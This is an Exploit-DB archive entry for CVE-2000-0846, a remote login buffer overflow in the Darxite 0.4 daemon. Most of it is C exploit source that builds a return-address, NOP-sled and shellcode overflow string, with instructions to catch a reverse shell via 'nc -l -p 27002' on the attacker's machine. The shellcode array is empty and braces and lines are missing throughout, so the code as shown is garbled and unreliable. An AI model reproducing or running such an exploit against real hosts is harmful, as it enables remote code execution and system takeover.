Darxite 0.4 Login Buffer Overflow Vulnerability

ID EDB-ID:20159
Type exploitdb
Reporter Scrippie
Modified 2000-08-22T00:00:00


Darxite 0.4 Login Buffer Overflow Vulnerability. CVE-2000-0846. Remote exploit for linux platform

                                            source: http://www.securityfocus.com/bid/1598/info

Darxite 0.4 does not do proper bounds checking on user-supplied data during the login process, relying on sprintf() to deliver the data into a 256 character buffer. Therefore, it is possible for an attacker to supply arbitrary code for execution at the privilege level of the Darxite user.

   Darxite Daemon v0.4 password authentication overflow

   I tried to use some easy functions for string creation, and they seem to
   work pretty quick (no more hours of frustration writing for loops :).

   As always I used my own shellcode, you should do a "nc -l -p 27002" on the
   machine you fill in as "your IP" and execute this - if it works you'll have
   a shell in the netcat session.

   -- Scrippie/ronald@grafix.nl

/* Synnergy.net 2000 (c) */

#include <stdio.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <stdlib.h>
#include <string.h>

#define DARX_BUF        1024
#define NUM_NOPS        1000

int xconnect(unsigned long, unsigned int);
void readBanner(int socket);
char *strcreat(char *, char *, int);
char *stralign(char *, int);
char *longToChar(unsigned long);

char hellcode[]=

int main(int argc, char **argv)
   int sd;
   unsigned int align=0;
   unsigned long sip, retaddy=0xbffff928;
   char *iploc, *evilstring;

   if(argc < 4) {
      printf("Use as: %s <target IP> <target port> <your ip> [ret addy]
         \n", argv[0]);

   if((sip = inet_addr(argv[3])) == -1) {

   if(argc > 4) retaddy = strtoul(argv[4], NULL, 16);
   if(argc > 5) align = atoi(argv[5]);

   printf("Using return address: 0x%lx\n", retaddy);
   printf("Using alignment: %d\n", align);

   /* Locate the IP position in the shellcode */
   iploc=(char *)strchr(hellcode, 0xBB);
   memcpy((void *) iploc, (void *) &sip, 4);

   /* Generate the overflow string */

   evilstring = strcreat(NULL, "A", align);
      /* We memory leak 5 bytes here, don't make a service out of this :) */
   evilstring = strcreat(evilstring, longToChar(retaddy), (DARX_BUF+8)>>2);
   evilstring = strcreat(evilstring, "\x90", NUM_NOPS);
   evilstring = strcreat(evilstring, hellcode, 1);

   sd = xconnect(inet_addr(argv[1]), atoi(argv[2]));

   printf("Connected... Now sending overflow...\n");

   send(sd, evilstring, strlen(evilstring)+1, 0);


   Returns the socket descriptor to "ip" on "port"

int xconnect(unsigned long ip, unsigned int port)
   struct sockaddr_in sa;       /* Sockaddr */
   int sd;                      /* Socket Descriptor */

   if((sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {

   memset(&sa, 0x00, sizeof(struct sockaddr_in));

   if(connect(sd, &sa, sizeof(struct sockaddr_in)) == -1) {


   Yummy yummy function for easy string creation

char *strcreat(char *dest, char *pattern, int repeat)
   char *ret;
   size_t plen, dlen=0;
   int i;

   if(dest) dlen = strlen(dest);
   plen = strlen(pattern);

   ret = (char *)realloc(dest, dlen+repeat*plen+1);

   for(i=0;i<repeat;i++) {
      strcat(ret, pattern);

   Converts a long to an array containing this long

char *longToChar(unsigned long blaat)
   unsigned int i;
   char *ret;

   ret = (char *)malloc(sizeof(long)+1);

   for(i=0;i<sizeof(long);i++) {
      ret[i] = (blaat >> (i<<3)) & 0xff;
   ret[sizeof(long)] = 0x00;